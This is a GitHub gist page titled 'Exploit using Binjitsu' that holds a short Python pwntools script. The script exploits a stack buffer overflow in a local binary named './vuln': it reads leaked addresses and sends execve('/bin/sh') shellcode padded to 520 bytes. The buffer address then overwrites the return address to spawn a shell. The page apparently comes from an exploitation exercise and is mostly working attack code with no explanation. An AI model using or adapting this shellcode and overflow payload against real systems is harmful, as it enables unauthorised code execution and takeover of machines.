Skip to content

Instantly share code, notes, and snippets.

@shankaraman

shankaraman/exploit.py

Last active August 29, 2015 14:22
Show Gist options
  • Save shankaraman/0d4ea63fb8c0fac99562 to your computer and use it in GitHub Desktop.
Save shankaraman/0d4ea63fb8c0fac99562 to your computer and use it in GitHub Desktop.
Download ZIP
Exploit using Binjitsu
Raw
exploit.py
from pwn import *
p = process('./vuln')
libc = ELF('/lib/i386-linux-gnu/libc.so.6')
data = p.recvline().strip()
fn_b_addr = int(data.split(":")[1], 16)
#print hex(fn_b_addr)
data = p.recvline().strip()
buffer_addr = int(data.split(":")[1], 16)
print hex(buffer_addr)
payload = "\xeb\x18\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh"
junk = 'a'
payload += junk*(520-len(payload))
payload += p32(buffer_addr)
p.sendline(payload)
raw_input()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment